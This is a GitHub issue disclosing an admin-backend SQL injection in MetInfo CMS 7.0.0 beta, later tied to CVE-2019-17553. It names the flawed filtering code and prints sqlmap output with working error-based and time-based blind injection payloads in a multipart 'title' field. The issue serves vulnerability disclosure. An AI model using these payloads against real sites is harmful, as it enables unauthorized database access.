Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

MetInfo7.0 beta后台注入 #1

Closed
sari3l opened this issue Oct 14, 2019 · 1 comment
Closed

MetInfo7.0 beta后台注入 #1

sari3l opened this issue Oct 14, 2019 · 1 comment

Comments

@sari3l
Copy link
Owner

sari3l commented Oct 14, 2019

Vulnerability Name: Metinfo CMS Background SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://www.metinfo.cn/upload/file/MetInfo7.0.0beta.zip
Version: V7.0.0 beta

web can see the web application uses gpc to filter variables in the form.
code in app/system/entrance.php:71
image

but the developers use the get_sql function for secondary filtering, causing escape single quotes.
code in app/system/tags/admin/index.class.php:171
image

payload

image

attack with sqlmap

Multipart-like data found in POST data. Do you want to process it? [Y/n/q]
[18:25:17] [INFO] resuming back-end DBMS 'mysql'
[18:25:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: MULTIPART title ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 5805=5805 AND (SELECT 3007 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(3007=3007,1))),0x717a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- aAqw
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: ------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_name"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="title"

test' WHERE 2052=2052 AND SLEEP(5)-- YLsI
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="keywords"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="description"

sss
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_pinyin"

test
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="module"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="sort"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_color"


------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="tag_size"

0
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="id"

4
------WebKitFormBoundaryKV2BbPJBOgFDx0EC
Content-Disposition: form-data; name="submit_type"

save
------WebKitFormBoundaryKV2BbPJBOgFDx0EC--
---
[18:25:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.6.9
back-end DBMS: MySQL >= 5.0
@sari3l sari3l changed the title MetInfo7.0 beta后台注入 #1 MetInfo7.0 beta后台注入 Oct 14, 2019
@sari3l
Copy link
Owner Author

sari3l commented Oct 16, 2019

CVE-2019-17553

@sari3l sari3l closed this as completed Oct 16, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant